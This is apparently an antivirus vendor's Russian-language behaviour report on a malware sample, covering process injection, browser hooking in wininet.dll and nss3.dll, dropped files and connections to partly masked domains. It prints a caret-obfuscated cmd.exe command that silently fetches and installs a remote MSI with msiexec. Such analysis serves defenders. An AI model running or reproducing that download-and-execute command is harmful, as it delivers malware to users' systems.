Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://ar#####eldeco.com.tn/admin/89002.msi /qn
Внедряет код в
следующие системные процессы:
- %WINDIR%\explorer.exe
следующие пользовательские процессы:
- iexplore.exe
Перехватывает функции
в браузерах
- Процесс iexplore.exe, модуль wininet.dll
- Процесс firefox.exe, модуль nss3.dll
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\nsra860.tmp
- %TEMP%\slpm9j65ix5821x67
- %TEMP%\3c8sc58x46v96
- %TEMP%\nswa880.tmp\qldlbh595.dll
Удаляет следующие файлы
- %WINDIR%\installer\msia7b6.tmp
Сетевая активность
Подключается к
- 'ex####omistico.com':80
- 'mo#####illievintage.com':80
- 'wi##ab.net':80
- 'or####organical.com':80
UDP
- DNS ASK ar#####eldeco.com.tn
- DNS ASK ex####omistico.com
- DNS ASK mo#####illievintage.com
- DNS ASK wi##ab.net
- DNS ASK or####organical.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msia7b6.tmp'
- '<SYSTEM32>\cmd.exe' /C m^SiE^x^e^c /i http://ar#####eldeco.com.tn/admin/89002.msi /qn' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\msiexec.exe' /i http://ar#####eldeco.com.tn/admin/89002.msi /qn
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%WINDIR%\Installer\MSIA7B6.tmp"
